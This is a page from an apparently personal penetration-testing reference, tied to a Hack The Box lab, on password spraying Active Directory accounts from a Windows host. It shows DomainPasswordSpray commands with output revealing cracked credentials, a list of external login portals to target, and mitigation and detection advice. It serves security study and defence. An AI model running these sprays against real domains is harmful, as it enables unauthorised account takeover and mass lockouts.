Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • Pass the Ticket
      • Pass the Ticket (PtT) from Windows
      • Pass the Ticket (PtT) from Linux
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
    • AS-REP roasting
    • Kerberosting
      • Kerberos "Double Hop" Problem
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • BloodHound
    • Bloodhound CE
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Miscellaneous Misconfigurations
    • Attacking Active Directory & NTDS.dit 1
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Mitigations
  • Other Considerations
  • Detection
  • External Password Spraying
  • Moving Deeper
  • Example Password Spraying from Windows
  1. Active Directory
  2. Password Spraying

Internal Password Spraying - from Windows

PreviousInternal Password Spraying - from LinuxNextEnumerating Security Controls

Last updated 4 months ago

From a foothold on a domain-joined Windows host, the tool is highly effective. If we are authenticated to the domain, the tool will automatically generate a user list from Active Directory, query the domain password policy, and exclude user accounts within one attempt of locking out. Like how we ran the spraying attack from our Linux host, we can also supply a user list to the tool if we are on a Windows host but not authenticated to the domain. We may run into a situation where the client wants us to perform testing from a managed Windows device in their network that we can load tools onto. We may be physically on-site in their offices and wish to test from a Windows VM, or we may gain an initial foothold through some other attack, authenticate to a host in the domain and perform password spraying in an attempt to obtain credentials for an account that has more rights in the domain.

There are several options available to us with the tool. Since the host is domain-joined, we will skip the -UserList flag and let the tool generate a list for us. We'll supply the Password flag and one single password and then use the -OutFile flag to write our output to a file for later use.

Using DomainPasswordSpray.ps1

Internal Password Spraying - from Windows

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

[*] Current domain is compatible with Fine-Grained Password Policy.
[*] Now creating a list of users to spray...
[*] The smallest lockout threshold discovered in the domain is 5 login attempts.
[*] Removing disabled users from list.
[*] There are 2923 total users found.
[*] Removing users within 1 attempt of locking out from list.
[*] Created a userlist containing 2923 users gathered from the current user's domain
[*] The domain password policy observation window is set to  minutes.
[*] Setting a  minute wait in between sprays.

Confirm Password Spray
Are you sure you want to perform a password spray against 2923 accounts?
[Y] Yes  [N] No  [?] Help (default is "Y"): Y

[*] Password spraying has begun with  1  passwords
[*] This might take a while depending on the total number of users
[*] Now trying password Welcome1 against 2923 users. Current time is 2:57 PM
[*] Writing successes to spray_success
[*] SUCCESS! User:sgage Password:Welcome1
[*] SUCCESS! User:tjohnson Password:Welcome1

[*] Password spraying is complete
[*] Any passwords that were successfully sprayed have been output to spray_success

We could also utilize Kerbrute to perform the same user enumeration and spraying steps shown in the previous section. The tool is present in the C:\Tools directory if you wish to work through the same examples from the provided Windows host.

Mitigations

Several steps can be taken to mitigate the risk of password spraying attacks. While no single solution will entirely prevent the attack, a defense-in-depth approach will render password spraying attacks extremely difficult.

Technique
Description

Multi-factor Authentication

Multi-factor authentication can greatly reduce the risk of password spraying attacks. Many types of multi-factor authentication exist, such as push notifications to a mobile device, a rotating One Time Password (OTP) such as Google Authenticator, RSA key, or text message confirmations. While this may prevent an attacker from gaining access to an account, certain multi-factor implementations still disclose if the username/password combination is valid. It may be possible to reuse this credential against other exposed services or applications. It is important to implement multi-factor solutions with all external portals.

Restricting Access

It is often possible to log into applications with any domain user account, even if the user does not need to access it as part of their role. In line with the principle of least privilege, access to the application should be restricted to those who require it.

Reducing Impact of Successful Exploitation

A quick win is to ensure that privileged users have a separate account for any administrative activities. Application-specific permission levels should also be implemented if possible. Network segmentation is also recommended because if an attacker is isolated to a compromised subnet, this may slow down or entirely stop lateral movement and further compromise.

Password Hygiene

Educating users on selecting difficult to guess passwords such as passphrases can significantly reduce the efficacy of a password spraying attack. Also, using a password filter to restrict common dictionary words, names of months and seasons, and variations on the company's name will make it quite difficult for an attacker to choose a valid password for spraying attempts.

Other Considerations

It is vital to ensure that your domain password lockout policy doesn’t increase the risk of denial of service attacks. If it is very restrictive and requires an administrative intervention to unlock accounts manually, a careless password spray may lock out many accounts within a short period.

Detection

Some indicators of external password spraying attacks include many account lockouts in a short period, server or application logs showing many login attempts with valid or non-existent users, or many requests in a short period to a specific application or URL.

With these mitigations finely tuned and with logging enabled, an organization will be well-positioned to detect and defend against internal and external password spraying attacks.

External Password Spraying

While outside the scope of this module, password spraying is also a common way that attackers use to attempt to gain a foothold on the internet. We have been very successful with this method during penetration tests to gain access to sensitive data through email inboxes or web applications such as externally facing intranet sites. Some common targets include:

  • Microsoft 0365

  • Outlook Web Exchange

  • Exchange Web Access

  • Skype for Business

  • Lync Server

  • Microsoft Remote Desktop Services (RDS) Portals

  • Citrix portals using AD authentication

  • VDI implementations using AD authentication such as VMware Horizon

  • VPN portals (Citrix, SonicWall, OpenVPN, Fortinet, etc. that use AD authentication)

  • Custom web applications that use AD authentication

Moving Deeper

Now that we have several sets of valid credentials, we can begin digging deeper into the domain by performing credentialed enumeration with various tools. We will walk through several tools that complement each other to give us the most complete and accurate picture of a domain environment. With this information, we will seek to move laterally and vertically in the domain to eventually reach the end goal of our assessment.

Example Password Spraying from Windows

Find a user with the password Winter2022. Submit the username as the answer.

In the Domain Controller’s security log, many instances of event ID over a short period may indicate a password spraying attack. Organizations should have rules to correlate many logon failures within a set time interval to trigger an alert. A more savvy attacker may avoid SMB password spraying and instead target LDAP. Organizations should also monitor event ID , which may indicate an LDAP password spraying attempt. To do so, they will need to enable Kerberos logging. This details research around detecting password spraying using Windows Security Event Logging.

DomainPasswordSpray
4625: An account failed to log on
4771: Kerberos pre-authentication failed
post